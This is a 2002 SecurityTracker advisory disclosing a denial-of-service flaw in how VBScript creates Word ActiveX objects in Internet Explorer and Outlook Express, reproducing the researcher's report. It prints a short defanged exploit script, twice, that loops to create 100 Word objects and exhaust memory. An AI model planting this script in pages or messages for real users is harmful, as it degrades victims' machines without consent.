SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Microsoft Word Vendors:   Microsoft
Microsoft Word Object Creation Flaw Lets Remote Users Create ActiveX That Will Consume Memory on the Victim's Computer
SecurityTracker Alert ID:  1004048
SecurityTracker URL:  http://securitytracker.com/id/1004048
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 16 2002
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in Microsoft's VBscript in creating Word objects. A remote user can create ActiveX code that will cause a denial of service condition on the victim's computer.

It is reported that there is a flaw in the ActiveX object creation used in VBscript for Word objects.

The following demonstration exploit code is provided (remove "_" before using it):

;<_SCRIPT LANGUAGE="VbScript">
;On Error Resume Next
;Dim a
;Dim i
;for i=1 to 100
;Set a = CreateObject("Word.Application")
;Next
;<_/SCRIPT>

According to the report, this will create an ActiveX object. If the user denies execution of the script, the script will apparently be stopped but the creation of the Word object will still continue in memory.

This flaw apparently affects IE/Outlook Express and Word2000/XP objects.

Impact:   A remote user can create ActiveX that, when loaded on the target (victim) user's computer, will cause a large amount of memory to be consumed on the target user's host, even if the target user denies execution of the script.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Resource error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  IE Word ActiveX DoS Loop




There is a flaw in ActiveX object creation
used in VBscript for Word object; this can
be used as Denial of Service.

Try to use this code (remove "_" before using it) :

;<_SCRIPT LANGUAGE="VbScript">
;On Error Resume Next
;Dim a
;Dim i
;for i=1 to 100
;Set a = CreateObject("Word.Application")
;Next
;<_/SCRIPT>

This script will activate the security warning about
creation of an ActiveX object, but when someone 
click on "NO" and deny execution
of the script, the script is stopped, but
the creation Word object in memory still
continues. This sample script creates 100 Word 
object in memory.....it's a real DoS!
(try CTRL+ALT+CANC to see them)

Works for IE/Outlook Express and Word2000/XP
objects. Other office components (excel, powerpoint,
access, etc.) maybe not affected.

Elia Florio

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC